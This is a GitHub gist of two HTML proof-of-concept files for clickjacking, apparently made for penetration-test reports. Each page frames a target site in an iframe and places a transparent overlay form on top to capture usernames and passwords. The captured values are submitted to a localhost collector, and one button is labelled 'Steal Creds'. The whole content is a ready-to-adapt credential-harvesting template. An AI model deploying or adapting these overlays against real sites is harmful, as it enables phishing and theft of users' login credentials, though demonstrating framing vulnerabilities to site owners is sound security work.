Last active
May 18, 2020 00:32
-
-
Save hoodoer/8eb78ff777472c2090c702a769967a3f to your computer and use it in GitHub Desktop.
Clickjack POC for input forms.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <style> | |
| .overlay { | |
| float: top; | |
| position: absolute; | |
| padding: 245px; | |
| width: 250px; | |
| clear: both; | |
| } | |
| .overlay input { | |
| width: 100%; | |
| clear: both; | |
| } | |
| </style> | |
| <head> | |
| <title>Clickjack POC</title> | |
| </head> | |
| <body> | |
| <p>Website is vulnerable to clickjacking!</p> | |
| <!-- POC overlay --> | |
| <div class="overlay"> | |
| <form action="http://localhost:80/" method="GET"> | |
| <input name="user" type="text"> | |
| <input name="pwd" type="password"> | |
| <button style="left:240px;top:214px;width:100px;height:31px" | |
| type="submit"></button> | |
| </form> | |
| </div> | |
| <iframe src="https://SOME.URL" width="500" height="500"></iframe> | |
| </body> | |
| </html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <style> | |
| .overlay { | |
| float: top; | |
| position: absolute; | |
| top: 280; | |
| left: 170; | |
| padding: 65px; | |
| width: 450px; | |
| height: 1000px; | |
| clear: both; | |
| } | |
| .overlay input { | |
| width: 100%; | |
| clear: both; | |
| } | |
| .button { | |
| background-color: #659EC7; | |
| border: none; | |
| color: white; | |
| padding: 8px 10px; | |
| text-align: center; | |
| text-decoration: none; | |
| display: inline-block; | |
| font-size: 11px; | |
| margin: 4px 2px; | |
| cursor: pointer; | |
| float: right; | |
| margin-top: 24px; | |
| } | |
| </style> | |
| <head> | |
| <title>TrustedSec POC</title> | |
| </head> | |
| <body> | |
| <p>Website is vulnerable to framing/clickjacking.</p> | |
| <!-- POC overlay --> | |
| <div class="overlay"> | |
| <form action="http://localhost:80/" method="GET"> | |
| <input name="user" type="text"> | |
| | |
| <input name="pwd" type="password"> | |
| <button class="button" ; type="submit">Steal Creds</button> | |
| </form> | |
| </div> | |
| <iframe src="https://WEBSITE.COM" width="800" height="500"></iframe> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment